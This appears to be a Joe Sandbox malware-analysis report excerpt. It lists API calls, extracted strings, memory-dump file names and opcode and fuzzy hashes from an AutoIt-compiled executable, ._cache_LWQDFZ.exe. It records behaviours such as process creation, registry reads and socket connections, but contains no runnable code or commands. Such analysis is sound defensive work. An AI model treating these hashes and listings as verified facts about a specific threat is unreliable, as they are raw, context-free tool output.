                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_LWQDFZ.exe$CMDLINE$CMDLINERAW
                                                                                                                      • API String ID: 861526374-1764967116
                                                                                                                      • Opcode ID: b3d41654e1df0dcc30a07f29df1aec6a1bf15caf23d574407fac775a0e60a957
                                                                                                                      • Instruction ID: 0ede0f420bb24eaa1a337b9ef0f8978257a36180fe0eb9da80647f90741a39e9
                                                                                                                      • Opcode Fuzzy Hash: b3d41654e1df0dcc30a07f29df1aec6a1bf15caf23d574407fac775a0e60a957
                                                                                                                      • Instruction Fuzzy Hash: 75818676800119AACB06EBE0DD52EEFB77CEF5A350F10001AF541BB191EFB46A44CB66

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 208665112-3771769585
                                                                                                                      • Opcode ID: dc2c1ffb43c844bde0f5b98dacb86e0e0e66d704450bd3ae64c1694073e2a903
                                                                                                                      • Instruction ID: 380bf21324b90588d1382350e2c2625faf93c2950b08674f7b401e4e0076402b
                                                                                                                      • Opcode Fuzzy Hash: dc2c1ffb43c844bde0f5b98dacb86e0e0e66d704450bd3ae64c1694073e2a903
                                                                                                                      • Instruction Fuzzy Hash: 8F110531A08125AFCB26A7719C49FDA776CDF41720F100179F405D60D2EF74DA818BA4

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 003A30B0
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 003A30BF
                                                                                                                      • LoadIconW.USER32(00000063), ref: 003A30D5
                                                                                                                      • LoadIconW.USER32(000000A4), ref: 003A30E7
                                                                                                                      • LoadIconW.USER32(000000A2), ref: 003A30F9
                                                                                                                        • Part of subcall function 003A318A: LoadImageW.USER32(003A0000,00000063,00000001,00000010,00000010,00000000), ref: 003A31AE
                                                                                                                      • RegisterClassExW.USER32(?), ref: 003A3167
                                                                                                                        • Part of subcall function 003A2F58: GetSysColorBrush.USER32(0000000F), ref: 003A2F8B
                                                                                                                        • Part of subcall function 003A2F58: RegisterClassExW.USER32(00000030), ref: 003A2FB5
                                                                                                                        • Part of subcall function 003A2F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 003A2FC6
                                                                                                                        • Part of subcall function 003A2F58: LoadIconW.USER32(000000A9), ref: 003A3009
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                      • API String ID: 2880975755-4155596026
                                                                                                                      • Opcode ID: c18e1702ac1ebcf22856316798610b9e16761c3ce4b543bfcedab6113d2fb555
                                                                                                                      • Instruction ID: 3d5d22a10f609c07bd4d3076863b2a71cf2f2e218ea56ee8d08aff4dd76e875e
                                                                                                                      • Opcode Fuzzy Hash: c18e1702ac1ebcf22856316798610b9e16761c3ce4b543bfcedab6113d2fb555
                                                                                                                      • Instruction Fuzzy Hash: C62141B0E00304AFCB11DFA9EC4AA99BFF5FB49310F14413AE614A72B1E7B545449F9A

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003FB777
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003FB7A4
                                                                                                                      • CoUninitialize.COMBASE ref: 003FB7AE
                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 003FB8AE
                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 003FB9DB
                                                                                                                      • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 003FBA0F
                                                                                                                      • CoGetObject.OLE32(?,00000000,0042D91C,?), ref: 003FBA32
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 003FBA45
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003FBAC5
                                                                                                                      • VariantClear.OLEAUT32(0042D91C), ref: 003FBAD5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2395222682-0
                                                                                                                      • Opcode ID: 43fb995df30d7be46a8144bbef12e8229a4675c9385b5a7ed8d529d3880fe258
                                                                                                                      • Instruction ID: 6530296193b004581b3020cdaab5ed97aeb3a28a987b9377e57e5cfd517ea89b
                                                                                                                      • Opcode Fuzzy Hash: 43fb995df30d7be46a8144bbef12e8229a4675c9385b5a7ed8d529d3880fe258
                                                                                                                      • Instruction Fuzzy Hash: 57C124B1608349AFC701DF68C88496BB7E9FF89348F00495DFA8A9B251DB71ED05CB52

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 003A2F8B
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 003A2FB5
                                                                                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 003A2FC6
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 003A3009
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 975902462-1005189915
                                                                                                                      • Opcode ID: 855557896272267f05d4fd86b120f2fee6947a15fb9e2b3d5885ebe11ac97ad0
                                                                                                                      • Instruction ID: 36a55a4607ed4d3764d5b1f2fc1d458b12ccc8b14be70af30ede7aae2a368026
                                                                                                                      • Opcode Fuzzy Hash: 855557896272267f05d4fd86b120f2fee6947a15fb9e2b3d5885ebe11ac97ad0
                                                                                                                      • Instruction Fuzzy Hash: 6D21E3B5E00308AFDB10AFA4E849BCDBBF4FB08704F10412AF611A72A0E7B44145CF9A

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004023E6
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00402579
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040259D
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004025DD
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004025FF
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00402760
                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00402792
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004027C1
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00402838
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4090791747-0
                                                                                                                      • Opcode ID: 0cb483356d5292ea5236ca782c680aeaec9a36802ca6a3a0f0b628db4de1ce52
                                                                                                                      • Instruction ID: 7221b88af38e1d17e7d0edc9b6a63f844d28fb46baa693b8c27ce25627a6abc3
                                                                                                                      • Opcode Fuzzy Hash: 0cb483356d5292ea5236ca782c680aeaec9a36802ca6a3a0f0b628db4de1ce52
                                                                                                                      • Instruction Fuzzy Hash: ADD1BD316042019FC716EF24C985B6ABBE1AF89310F14846EF885AF2E2DB74DC41CB56

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 0-572801152
                                                                                                                      • Opcode ID: 9c6b424a811ec7d5a307d643d02a62f1328652ac3f58c58e9272779cd6d04d69
                                                                                                                      • Instruction ID: 215732849063ac17846e4796666bc6b757fa51aaa155a524b83f7083d726e09b
                                                                                                                      • Opcode Fuzzy Hash: 9c6b424a811ec7d5a307d643d02a62f1328652ac3f58c58e9272779cd6d04d69
                                                                                                                      • Instruction Fuzzy Hash: EAE1B171A9021DABCF12DF64DA81BBE77B9FF48314F154029FA45AB281D770AD41CB90

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 2862541840-625585964
                                                                                                                      • Opcode ID: b2e529837b962eb15c9909862e6abb672f4c1d39e14d16a28c4a6ebee9319458
                                                                                                                      • Instruction ID: 4138d0a458d0663936bc31cab2d38f467e7656b8fe459de029f7ef773ba45622
                                                                                                                      • Opcode Fuzzy Hash: b2e529837b962eb15c9909862e6abb672f4c1d39e14d16a28c4a6ebee9319458
                                                                                                                      • Instruction Fuzzy Hash: 4C91DE71A5021DABCF25CFA4CD44FAEBBB8EF45710F10851AFA05AB281D7709941CFA0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003A34E2,?,00000001), ref: 003A3FCD
                                                                                                                      • _free.LIBCMT ref: 00413C27
                                                                                                                      • _free.LIBCMT ref: 00413C6E
                                                                                                                        • Part of subcall function 003ABDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,004622E8,?,00000000,?,003A3E2E,?,00000000,?,0043DBF0,00000000,?), ref: 003ABE8B
                                                                                                                        • Part of subcall function 003ABDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,003A3E2E,?,00000000,?,0043DBF0,00000000,?,00000002), ref: 003ABEA7
                                                                                                                        • Part of subcall function 003ABDF0: __wsplitpath.LIBCMT ref: 003ABF19
                                                                                                                        • Part of subcall function 003ABDF0: _wcscpy.LIBCMT ref: 003ABF31
                                                                                                                        • Part of subcall function 003ABDF0: _wcscat.LIBCMT ref: 003ABF46
                                                                                                                        • Part of subcall function 003ABDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 003ABF56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<:$G-:
                                                                                                                      • API String ID: 1510338132-1330228751
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,003BEADA,?,?), ref: 003BEB27
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,003BEADA,?,?), ref: 00414B26
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,003BEADA,?,?), ref: 00414B65
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,003BEADA,?,?), ref: 00414B94
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryValue$CloseOpen
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                      • API String ID: 1586453840-614718249
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003A2ECB
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003A2EEC
                                                                                                                      • ShowWindow.USER32(00000000), ref: 003A2F00
                                                                                                                      • ShowWindow.USER32(00000000), ref: 003A2F09
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A3B1E: _wcsncpy.LIBCMT ref: 003A3B32
                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 003E6DBA
                                                                                                                      • GetLastError.KERNEL32 ref: 003E6DC5
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 003E6DD9
                                                                                                                      • _wcsrchr.LIBCMT ref: 003E6DFB
                                                                                                                        • Part of subcall function 003E6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 003E6E31
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3633006590-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003FACD3: inet_addr.WS2_32(00000000), ref: 003FACF5
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 003F9160
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F916F
                                                                                                                      • connect.WS2_32(00000000,?,00000010), ref: 003F918B
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3701255441-0
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: dEE
                                                                                                                      • API String ID: 0-992457905
                                                                                                                      APIs
                                                                                                                      • SHGetMalloc.SHELL32(1<:), ref: 003A3A7D
                                                                                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 003A3AD2
                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 003A3A8F
                                                                                                                        • Part of subcall function 003A3B1E: _wcsncpy.LIBCMT ref: 003A3B32
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                      • String ID: 1<:
                                                                                                                      • API String ID: 3981382179-1863841528
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003BC948,SwapMouseButtons,00000004,?), ref: 003BC979
                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,003BC948,SwapMouseButtons,00000004,?,?,?,?,003BBF22), ref: 003BC99A
                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,003BC948,SwapMouseButtons,00000004,?,?,?,?,003BBF22), ref: 003BC9BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A16F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 003A1751
                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003A159B
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003A1612
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004158F7
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                      • String ID: '/>
                                                                                                                      • API String ID: 458326420-289320113
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A41A7: _fseek.LIBCMT ref: 003A41BF
                                                                                                                        • Part of subcall function 003ECE59: _wcscmp.LIBCMT ref: 003ECF49
                                                                                                                        • Part of subcall function 003ECE59: _wcscmp.LIBCMT ref: 003ECF5C
                                                                                                                      • _free.LIBCMT ref: 003ECDC9
                                                                                                                      • _free.LIBCMT ref: 003ECDD0
                                                                                                                      • _free.LIBCMT ref: 003ECE3B
                                                                                                                        • Part of subcall function 003C28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,003C8715,00000000,003C88A3,003C4673,?), ref: 003C28DE
                                                                                                                        • Part of subcall function 003C28CA: GetLastError.KERNEL32(00000000,?,003C8715,00000000,003C88A3,003C4673,?), ref: 003C28F0
                                                                                                                      • _free.LIBCMT ref: 003ECE43
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1552873950-0
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003A1E87
                                                                                                                        • Part of subcall function 003A38E4: _memset.LIBCMT ref: 003A3965
                                                                                                                        • Part of subcall function 003A38E4: _wcscpy.LIBCMT ref: 003A39B5
                                                                                                                        • Part of subcall function 003A38E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003A39C6
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 003A1EDC
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003A1EEB
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00414526
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1378193009-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003EAEA5,?,?,00000000,00000008), ref: 003BF282
                                                                                                                        • Part of subcall function 003BF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003EAEA5,?,?,00000000,00000008), ref: 003BF2A6
                                                                                                                      • gethostbyname.WS2_32(?), ref: 003F92F0
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F92FB
                                                                                                                      • _memmove.LIBCMT ref: 003F9328
                                                                                                                      • inet_ntoa.WS2_32(?), ref: 003F9333
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1504782959-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003A1952
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003DE344
                                                                                                                      • _strlen.LIBCMT ref: 003DE34F
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Timeout_strlen
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 2777139624-2594219639
                                                                                                                      • Opcode ID: 25f0a18f45ca8ac95744dc44ec183d6f8b1a5c1375ec100692e39d2acb74fefe
                                                                                                                      • Instruction ID: 68fcb25fc454a4c8451174683b81a97fb7121bceb88d6e06bcab06e376847253
